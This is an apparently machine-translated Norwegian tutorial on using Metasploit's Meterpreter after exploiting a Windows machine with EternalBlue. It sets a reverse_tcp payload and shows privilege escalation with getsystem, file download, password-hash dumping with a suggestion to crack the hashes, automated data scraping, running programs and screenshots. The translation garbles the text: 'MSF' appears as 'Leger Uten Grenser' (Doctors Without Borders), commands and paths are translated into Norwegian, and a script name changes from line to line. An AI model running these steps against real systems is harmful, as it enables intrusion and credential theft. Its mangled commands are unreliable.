Introduksjon til meterpreter
Meterpreter er en angreps nyttelast i Metasploit -rammen som lar gjerningsmannen kontrollere og navigere i offerets datamaskin gjennom et kommandoskall. Det kan vise seg å være et veldig allsidig verktøy når det gjelder penetrasjonstesting. Det er et etterutnyttelsesverktøy som er basert på DLL-injeksjon i minnet, noe som betyr at det får den injiserte DLL-kjøringen ved å lage en ny prosess som ber om at systemet skal kjøre den injiserte DLL. Det kan gi deg tilgang til et usynlig kommandobeskall på en offermaskin, og lar deg kjøre kjørbare filer og profilnettverk.
Det ble opprinnelig skrevet for Metasploit 2.X og er oppgradert for Metasploit 3.
Vi vil diskutere bruken av meterpreter i detalj, men før det, la oss ha et ord om nyttelast generelt
Hva er nyttelast?
Nyttelast i Metasploit er moduler, noe som betyr at de er utdrag av koder i Metasploit som kjøres på det eksterne systemet vi målretter. Utnyttelsesmodulen sendes først, som installerer nyttelastmodulen på systemet. Deretter gir nyttelast tilgang til angriperen (begrenset eller fullverdig, avhenger av innholdet i nyttelast). For ytterligere å utdype funksjonen til nyttelast, må vi diskutere dens typer, som er 3 totalt:
Singler
Disse nyttelastene er helt selvstendige, noe som betyr at disse kan være like grunnleggende som portvaktkoder som lar brukeren inn i et målsystem.
Stagers
Stagers er nyttelast som samler applikasjoner i målsystemet og sender det til angriperen. Det etablerer forbindelsen mellom offeret til vår lokale maskin.
Stadier
Når Stagers har tilgang til systemet, laster de ned trinnsmodulene. Trinnsmoduler fjerner størrelseshetten på meterpreter.
Eksempler på stadier vil være et enkelt skall, iPhone 'IPWN' Shell, Meterpreter -moduler, VNC -injeksjon.
Du kan finne ut typen nyttelast ved å finne ut navnet. Enkelt nyttelast er vanligvis av formatet /
Utnyttelse med meterpreter
Først av alt, start Leger Uten Grenser ved å skrive følgende terminalkommando i Kali Terminal -vinduet.
$ SUDO MSFCONSOLE
Vi bruker Reverse_TCP som stager og meterpreter som scenen.
Vi begynner med å sette opp den evige blå utnyttelsen. Velg (MS17_010_eternalBlue) og sett deretter Windows/X64/Meterpreter/Reverse_TCP som den valgte nyttelasten
Konfigurer deretter utnyttelsesinnstillingene og kjør deretter utnyttelsen med Exploit -kommandoen:
$ set nyttelastvinduer/x64/meterpreter/reverse_tcp
$ sett Rhost 192.168.198.136
$ utnyttelse
De EternalBlue utnyttelse har blitt aktivert vellykket.
Etter utnyttelse
Vi får tilgang til og manipulerer det allerede kompromitterte systemet under etterutnyttelsen.
Vi kan gjøre mange ting nå som vi har tilgang til systemet, men som nevnt ovenfor, skal vi være fokusert hovedsakelig på å laste ned informasjon og skaffe brukeropplysning her
Administrere tilgangsprivilegium:
Avhengig av nyttelastmodulen og utnyttelsen du har brukt, kan du bli møtt med visse tilgangsbegrensninger som vil ødelegge dine evner til å manøvrere offermaskinen alvorlig. Du kan komme deg rundt dette problemet med opptrapping av privilegier gjennom å slette passord og tukle med registre. Du kan også eskalere privilegier ved å bruke Meterpreter's Get System -Command.
$ getSystem
$ getuid
Filoverføring med meterpreter
Med Meterpreter kan du laste ned en fil ved hjelp av $ Last ned-kommandoen.
$ Last ned/Windows/System32/Drivere/etc/verter
Tilsvarende kan du også laste opp informasjon til maskinen ved å bruke $ opplastingskommando
Trekk ut brukeropplysning:
Bruk kodeskript Credential_Collector for å trekke ut informasjon om brukerkontoer, eller bruk hash -dump -postmodulen til lignende effekt.
Vi bruker hash -dump -postmodulen for å fortsette med høsting av legitimasjon. Skriv inn følgende MSF -kommando.
$ Run Post/Windows/Samle/Hashdump
Som vi kan se, har vi skaffet oss Coen-, gjeste- og admin -kontoer. LM Hash (admin) og NTLM (gjestenes) hash gjelder tomme passord, mens Coen -hash er et passord som du trenger å knekke. Du kan gjøre det ved å bruke en passord cracker.
Automatisere systemskraping
Det kan være kjedelig å samle informasjon med individuelle inngangsuttalelser at du må fortsette å mate kommandoskallet. Praktisk kan du automatisere denne prosessen med Vineum-manus. Skriptet samler inn informasjon fra offeret og laster ned dataene til vår lokale maskin. Du vil bli fortalt hvor utdataene blir lagret, som du kan se i fjerde linje ovenfra:
$ Run Wineum
Husk at banen der utgangen til hver kommando er lagret, kan være annerledes enn den på skjermen her.
Lar oss rote litt mer
Utføre filer
Du kan kjøre hvilken som helst fil på systemet ved å bruke: Execute -F . Dette inkluderer både kjørbare filer og programmer med flere støttefiler. For eksempel, for å kjøre den innebygde kalkulator -appen i Windows OS, skriv ut Execute -f Calc.EXE
Tar skjermbilder
Du kan også fange skjermbilder fra brukerens synspunkt. Bare skriv skjermbilde i Meterpreter's Command Shell, så får du et skjermbilde av displayet på systemet.
$ execute -f Calc.EXE
$ skjermbilde
Konklusjon:
Dette har vært en kort introduksjon til meterpreter -plugin i Metasploit -rammen, sammen med en kort guide som viser det er mest grunnleggende bruksområder. Vi har her lært hvordan vi kan bryte et Windows OS-system med EternalBlue utnyttelse for å få tilgang, deretter bruke Meterpreter for å eskalere privilegier, samle informasjon manuelt og ved automatiserende Vineus-kommando. Vi har også lært hvordan du utfører filer på offermaskinen.
Meterpreter kan tjene som et nevneverdig middel for sårbarhetsdeteksjon, til tross for at de er en konglomerasjon av grunnleggende verktøy innen Metasploits rammeverk.